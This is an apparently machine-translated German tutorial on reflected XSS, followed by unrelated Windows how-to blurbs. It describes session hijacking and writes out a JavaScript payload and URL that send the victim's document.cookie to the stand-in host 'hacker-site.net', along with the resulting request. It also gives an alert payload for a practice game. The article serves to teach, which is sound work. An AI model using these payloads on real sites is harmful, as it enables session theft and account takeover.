Web7: XSS-Exploits – Teil 1: Reflektiertes XSS

Web7: XSS-Exploits – Teil 1: Reflektiertes XSS

Was ist Cross-Site-Scripting?

Cross-Site Scripting (XSS) ist heute eine der beliebtesten Angriffstechniken, bekannt als „Godfather of Attack“ und wird seit vielen Jahren als die gefährlichste Angriffstechnik für Anwendungen aufgeführt.

Nennen Sie es nicht kurz CSS, um Verwechslungen mit dem Cascading Style Sheet-Konzept von HTML zu vermeiden. Die XSS-
Technik

Um es besser zu verstehen, betrachten wir das folgende Beispiel. Eine Webanwendung, die das Drucken des über die URL übergebenen Werts ermöglicht, vorausgesetzt, wir übergeben der Namensvariablen den Ping-Wert:

Web7: XSS-Exploits – Teil 1: Reflektiertes XSS

Bisher ist alles in Ordnung. Sehen wir uns den HTML-Quellcode an:

Web7: XSS-Exploits – Teil 1: Reflektiertes XSS

Es ist leicht zu erkennen, dass der von uns eingegebene Namenswert in den Quellcode eingefügt wurde. Es ist also möglich, dass alles, was importiert wird, auch eingefügt werden kann. Das Problem wird schwerwiegend, wenn der eingegebene Wert kein normaler String wie oben, sondern ein potenziell gefährlicher Code ist, etwa so:

 

Versuchen Sie es erneut mit dem oben genannten Wert:

Web7: XSS-Exploits – Teil 1: Reflektiertes XSS

Aus diesem Beispiel können wir zwei Dinge schließen. Erstens kann die Namensvariable einen beliebigen Eingabewert empfangen und ihn zur Verarbeitung an den Server übertragen. Zweitens hat der Server diesen Eingabewert nicht kontrolliert, bevor er ihn an den Browser zurückgegeben hat. Dies führt dazu, dass der Javascript-Code in den Quellcode eingefügt wird.

XSS wird im Allgemeinen in drei Haupttypen unterteilt: Reflektiert, Gespeichert und DOM-basiert. In diesem Artikel werde ich hauptsächlich die Reflected XSS-Technik erwähnen.

Bis zu 75 % der XSS-Techniken basieren auf Reflected XSS. Dies wird als „reflektiert“ bezeichnet, da der Hacker bei dieser Art von Exploit-Szenario dem Opfer eine URL senden muss, die bösartigen Code (normalerweise Javascript) enthält. Das Opfer muss lediglich diese URL anfordern und der Hacker erhält sofort eine Antwort mit dem gewünschten Ergebnis (hier gezeigte Reflexivität). Darüber hinaus wird es auch als XSS erster Ordnung bezeichnet.

Reales Bergbauszenario

Es gibt viele Möglichkeiten, den Reflected XSS-Fehler auszunutzen. Eine der bekanntesten Methoden besteht darin, die Sitzung des Benutzers zu übernehmen und so auf Daten zuzugreifen und seine Rechte auf der Website zu erlangen.

Einzelheiten werden in den folgenden Schritten beschrieben:

Web7: XSS-Exploits – Teil 1: Reflektiertes XSS

1. Der Benutzer meldet sich im Web an und geht davon aus, dass eine Sitzung zugewiesen ist:

Set-Cookie: sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4

2. Irgendwie sendet der Hacker dem Benutzer die URL:

http://example.com/name=var+i=new+Image;+i.src=”http://hacker-site.net/”%2bdocument.cookie;

Angenommen, example.com ist die Website, die das Opfer besucht, hacker-site.net ist die vom Hacker erstellte Website

3. Das Opfer greift auf die oben genannte URL zu

4. Der Server antwortet dem Opfer zusammen mit den in der Anfrage enthaltenen Daten (dem Javascript-Snippet des Hackers).

5. Der Browser des Opfers empfängt die Antwort und führt das Javascript aus

6. Das tatsächliche Javascript, das der Hacker erstellt hat, lautet wie folgt:

var i=new Image; i.src=”http://hacker-site.net/”+document.cookie;

Die obige Befehlszeile stellt im Wesentlichen eine Anfrage an die Website des Hackers, wobei der Parameter das Benutzer-Cookie ist:

GET /sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4 HTTP/1.1Host: hacker-site.net

7. Von Ihrer Website aus fängt der Hacker den oben genannten Anforderungsinhalt ab und geht davon aus, dass die Sitzung des Benutzers übernommen wurde. An diesem Punkt kann der Hacker sich als Opfer ausgeben und alle Rechte auf der Website ausüben, die das Opfer besitzt.

Üben

Google hat hier eine Seite zum Üben der Ausnutzung von XSS-Fehlern erstellt: https://xss-game.appspot.com

Das Ziel dieser Herausforderungen besteht darin, dass Sie Skripte einfügen müssen, um ein Popup zu öffnen. Die erste Herausforderung besteht darin, die reflektierte Technik zu veranschaulichen. Der Ausnutzungscode ist recht einfach:

https://xss-game.appspot.com/level1/frame?query=alert('pwned')

Viel Glück!


So blockieren Sie den Internetzugriff mithilfe von Gruppenrichtlinien (GPO)

So blockieren Sie den Internetzugriff mithilfe von Gruppenrichtlinien (GPO)

In diesem Artikel erfahren Sie, wie Sie den Internetzugriff für Benutzer oder Computer im Active Directory-Gruppenrichtlinienobjekt blockieren. Lernen Sie effektive Methoden, moderne Sicherheitsprotokolle und Best Practices kennen.

Warum müssen wir USB formatieren? Wie formatiere ich USB?

Warum müssen wir USB formatieren? Wie formatiere ich USB?

Das Formatieren eines USB-Sticks ähnelt dem Formatieren jedes anderen Laufwerks. Hier erfahren Sie, warum und wie Sie USB formatieren sollten, um optimale Ergebnisse zu erzielen.

Beheben Sie den Fehler „Game Security Violation Detected“ in Windows 10

Beheben Sie den Fehler „Game Security Violation Detected“ in Windows 10

Wenn beim Starten eines Spiels unter Windows 10 der Fehler „Game Security Violation Detected“ angezeigt wird, sind die Lösungen einfach und effektiv. Hier erfahren Sie, wie Sie dieses Problem beheben können.

So wechseln Sie die Lautsprecher mit Tastenkombinationen unter Windows 10

So wechseln Sie die Lautsprecher mit Tastenkombinationen unter Windows 10

Wechseln Sie mühelos zwischen Audiogeräten unter Windows 10 mit Tastenkombinationen. Erfahren Sie, wie Sie den Audio-Umschalter effizient nutzen.

8 Möglichkeiten, MSConfig in Windows 11 zu öffnen

8 Möglichkeiten, MSConfig in Windows 11 zu öffnen

Entdecken Sie 8 einfache Möglichkeiten, MSConfig in Windows 11 zu öffnen, um zahlreiche Probleme effizient zu beheben.

4 gefälschte Viren, die zum Spaß Freunde trollen

4 gefälschte Viren, die zum Spaß Freunde trollen

Freunde und Familienmitglieder zu trollen macht Spaß mit diesen harmlosen gefälschten Viren. Hier sind vier kreative Ideen, um Ihre Freunde zum Lachen zu bringen.

Unterschied zwischen Virtualisierung und Emulation

Unterschied zwischen Virtualisierung und Emulation

Entdecken Sie die Unterschiede zwischen Virtualisierung und Emulation sowie deren Vor- und Nachteile. Erfahren Sie, wie diese Technologien in modernen IT-Umgebungen eingesetzt werden.

So aktivieren oder deaktivieren Sie Device Guard unter Windows 10

So aktivieren oder deaktivieren Sie Device Guard unter Windows 10

Device Guard ist ein wichtiges Sicherheitsfeature in Windows 10, das sicherstellt, dass nur vertrauenswürdige Anwendungen ausgeführt werden. So aktivieren oder deaktivieren Sie es.

So verwenden Sie vDOS, um alte DOS-Programme unter Windows 10 auszuführen

So verwenden Sie vDOS, um alte DOS-Programme unter Windows 10 auszuführen

Erfahren Sie, wie Sie vDOS verwenden, um alte DOS-Software unter Windows 10 auszuführen. Dieser Emulator ist ideal für die Nutzung älterer Programme, bietet jedoch keine optimale Lösung für Spiele.

3 Möglichkeiten, USB Selective Suspend in Windows 11 zu deaktivieren

3 Möglichkeiten, USB Selective Suspend in Windows 11 zu deaktivieren

Wenn Sie Probleme mit USB-Geräten auf Ihrem Windows 11-Computer haben, sollten Sie die Funktion „USB Selective Suspend“ deaktivieren.